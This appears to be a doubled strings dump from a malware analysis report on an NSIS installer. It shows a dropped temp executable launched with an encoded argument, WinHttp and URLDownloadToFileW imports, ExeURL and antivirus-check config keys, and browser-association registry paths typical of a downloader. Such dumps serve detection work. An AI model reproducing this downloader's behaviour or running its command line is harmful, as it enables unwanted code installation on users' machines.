RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\beehjjcbdh.exe 4!0!5!6!0!8!9!4!4!8!4 K1BEPj0pLTAvLBwrU1A8UEE7OSwYK0pFT1FPSkJFQDUtHC8/Q1NMQEA5KywvMzMaLztAQDkoHCtQTUlETTpQW0FAOTI0LzYtFytPPU5SRU1ZVUpDOWRscGw6Kilzam0qQD1PRy1PSVAlOExMJkVKRkoaLztDRT9DRUA9GylEKTQpLRgrQDI4JzEYJkAvNSktICo NDUkLRwnQDE9KCsgJ0dOSzxRP1RaSlJBTT0/UTkcL0tMTzxMP1BXQVFMPDcgJ0dOSzxRP1RaSEFFPDlRaGBddGBtICc8VEFXUU5MOGJ0bGc2Kydga3dpZm9ZWylvXW5yZW1tLltmaStLdW9JaWBvJ01LT2xxXi5gcmUYJkFUPVs/TT9GSUY8ORwnREtTT1lCSkZTTz1OOTUbKVRAOEpHUUtRX1BMTDUXK1JFOS4gKj5TKTQcK0pRSlRER0VXTkFIO0tJRURHQT88UU5EORwvRE1fSkxKUEFJQT1vbHVdFytOPVBRUklDTj9WUU89TltEPFNTNSkcK0BFQEVTNzEYJkVPV0BVTjxHSTtWQUo7TlVQTz9ENV1daGthHC8/SVdGQ0s9PFtFUDgxNyYpMC0mMDEuLysgJ0c9TjlISEVHWUlGSlA9REg5dG1vZRgmUEVFQTkxLy44KCcsLDAtHC8/SVdGQ0s9PFtQSUg/PSkoKy4oKy4wLC8qLjEtMDIwLSo8Rw==
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\beehjjcbdh.exe 4!0!5!6!0!8!9!4!4!8!4 K1BEPj0pLTAvLBwrU1A8UEE7OSwYK0pFT1FPSkJFQDUtHC8/Q1NMQEA5KywvMzMaLztAQDkoHCtQTUlETTpQW0FAOTI0LzYtFytPPU5SRU1ZVUpDOWRscGw6Kilzam0qQD1PRy1PSVAlOExMJkVKRkoaLztDRT9DRUA9GylEKTQpLRgrQDI4JzEYJkAvNSktICo NDUkLRwnQDE9KCsgJ0dOSzxRP1RaSlJBTT0/UTkcL0tMTzxMP1BXQVFMPDcgJ0dOSzxRP1RaSEFFPDlRaGBddGBtICc8VEFXUU5MOGJ0bGc2Kydga3dpZm9ZWylvXW5yZW1tLltmaStLdW9JaWBvJ01LT2xxXi5gcmUYJkFUPVs/TT9GSUY8ORwnREtTT1lCSkZTTz1OOTUbKVRAOEpHUUtRX1BMTDUXK1JFOS4gKj5TKTQcK0pRSlRER0VXTkFIO0tJRURHQT88UU5EORwvRE1fSkxKUEFJQT1vbHVdFytOPVBRUklDTj9WUU89TltEPFNTNSkcK0BFQEVTNzEYJkVPV0BVTjxHSTtWQUo7TlVQTz9ENV1daGthHC8/SVdGQ0s9PFtFUDgxNyYpMC0mMDEuLysgJ0c9TjlISEVHWUlGSlA9REg5dG1vZRgmUEVFQTkxLy44KCcsLDAtHC8/SVdGQ0s9PFtQSUg/PSkoKy4oKy4wLC8qLjEtMDIwLSo8Rw==
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
beehjjcbdh.exe
beehjjcbdh.exe
8 8$8(8,80848
8 8$8(8,80848
Certification Services Division1806
Certification Services Division1806
hXXp://t2.symcb.com0
hXXp://t2.symcb.com0
!hXXp://t1.symcb.com/ThawtePCA.crl0
!hXXp://t1.symcb.com/ThawtePCA.crl0
hXXp://tl.symcb.com/tl.crl0
hXXp://tl.symcb.com/tl.crl0
hXXps://VVV.thawte.com/cps0/
hXXps://VVV.thawte.com/cps0/
!hXXps://VVV.thawte.com/repository0
!hXXps://VVV.thawte.com/repository0
hXXp://tl.symcd.com0&
hXXp://tl.symcd.com0&
hXXp://tl.symcb.com/tl.crt0
hXXp://tl.symcb.com/tl.crt0
.?AV?$CAtlExeModuleT@VCSmartInstallerModule@@@ATL@@
.?AV?$CAtlExeModuleT@VCSmartInstallerModule@@@ATL@@
.?AVCWebPage@@
.?AVCWebPage@@
:,:0:4:8:
:,:0:4:8:
9œ9P9g9
9œ9P9g9
9#9'9-91999
9#9'9-91999
9"9/999_9
9"9/999_9
="=&=*=.=
="=&=*=.=
WinHttpCrackUrl
WinHttpCrackUrl
WinHttpOpen
WinHttpOpen
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpConnect
WinHttpConnect
WinHttpReadData
WinHttpReadData
WinHttpWriteData
WinHttpWriteData
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpSetOption
WinHttpSetOption
WinHttpSetTimeouts
WinHttpSetTimeouts
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpAddRequestHeaders
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryHeaders
WinHttpGetProxyForUrl
WinHttpGetProxyForUrl
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetIEProxyConfigForCurrentUser
WINHTTP.dll
WINHTTP.dll
PSAPI.DLL
PSAPI.DLL
GetProcessHeap
GetProcessHeap
c:\%original file name%.exe
c:\%original file name%.exe
%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v2.46
Nullsoft Install System v2.46
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}
00000000
00000000
773.151120.1374.5770
773.151120.1374.5770
beehjjcbdh.exe_644:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
tCPjB
tCPjB
r%f;M
r%f;M
j.Yf;
j.Yf;
_tcPVj@
_tcPVj@
.PjRW
.PjRW
%d/%d/%d %d:%d:%d
%d/%d/%d %d:%d:%d
X:X:X:X:X:X
X:X:X:X:X:X
\Google\Chrome\Appl
\Google\Chrome\Appl
ication\chrome.exe
ication\chrome.exe
Error %u in WinHttpQueryDataAvailable.
Error %u in WinHttpQueryDataAvailable.
Error %u in WinHttpReadData.
Error %u in WinHttpReadData.
Error %d has occurred.
Error %d has occurred.
F%D,3
F%D,3
operator
operator
GetProcessWindowStation
GetProcessWindowStation
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
WinHttpCrackUrl
WinHttpCrackUrl
WinHttpOpen
WinHttpOpen
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpConnect
WinHttpConnect
WinHttpReadData
WinHttpReadData
WinHttpWriteData
WinHttpWriteData
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpSetOption
WinHttpSetOption
WinHttpSetTimeouts
WinHttpSetTimeouts
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpAddRequestHeaders
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryHeaders
WinHttpGetProxyForUrl
WinHttpGetProxyForUrl
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetIEProxyConfigForCurrentUser
WINHTTP.dll
WINHTTP.dll
PSAPI.DLL
PSAPI.DLL
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
CreateDialogIndirectParamW
CreateDialogIndirectParamW
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegEnumKeyExW
RegEnumKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
URLDownloadToFileW
URLDownloadToFileW
urlmon.dll
urlmon.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
GetCPInfo
GetCPInfo
zcÃ
zcÃ
.?AV?$CAtlExeModuleT@VCSmartInstallerModule@@@ATL@@
.?AV?$CAtlExeModuleT@VCSmartInstallerModule@@@ATL@@
.?AVCWebPage@@
.?AVCWebPage@@
:,:0:4:8:
:,:0:4:8:
9œ9P9g9
9œ9P9g9
9#9'9-91999
9#9'9-91999
9"9/999_9
9"9/999_9
="=&=*=.=
="=&=*=.=
8 8$8(8,80848
8 8$8(8,80848
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
\default.html
\default.html
*.txt
*.txt
SOFTWARE\Mozilla\Mozilla FireFox
SOFTWARE\Mozilla\Mozilla FireFox
Software\Mozilla\Mozilla FireFox
Software\Mozilla\Mozilla FireFox
SOFTWARE\Google\Update\Clients\{8A69D345-D564-463c-AFF1-A69D9E530F96}
SOFTWARE\Google\Update\Clients\{8A69D345-D564-463c-AFF1-A69D9E530F96}
Software\Mozilla\Mozilla Firefox
Software\Mozilla\Mozilla Firefox
firefox
firefox
chrome
chrome
opera
opera
@@exeurl
@@exeurl
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
ChromeHTML
ChromeHTML
FirefoxHTML
FirefoxHTML
IE.AssocFile.HTM
IE.AssocFile.HTM
Opera.HTML
Opera.HTML
http\shell\open\command
http\shell\open\command
Opera.exe
Opera.exe
Safari.exe
Safari.exe
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
4-1-0-2-3-1-9-2-2-8-5
4-1-0-2-3-1-9-2-2-8-5
AntivirusesRegKeys
AntivirusesRegKeys
RegKey32
RegKey32
RegKey64
RegKey64
ExeURL
ExeURL
ExeURL2
ExeURL2
RegKey
RegKey
ReportName
ReportName
PreExe
PreExe
PostExe
PostExe
PreExeResultTerm
PreExeResultTerm
PreExeResultValue
PreExeResultValue
PostExeResultTerm
PostExeResultTerm
PostExeResultValue
PostExeResultValue
PostRegKey32
PostRegKey32
PostRegKey64
PostRegKey64
n2d.exe
n2d.exe
downoad.exe
downoad.exe
WinHttpClient
WinHttpClient
Hmscoree.dll
Hmscoree.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
kernel32.dll
kernel32.dll
USER32.DLL
USER32.DLL
portuguese-brazilian
portuguese-brazilian
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\beehjjcbdh.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\beehjjcbdh.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}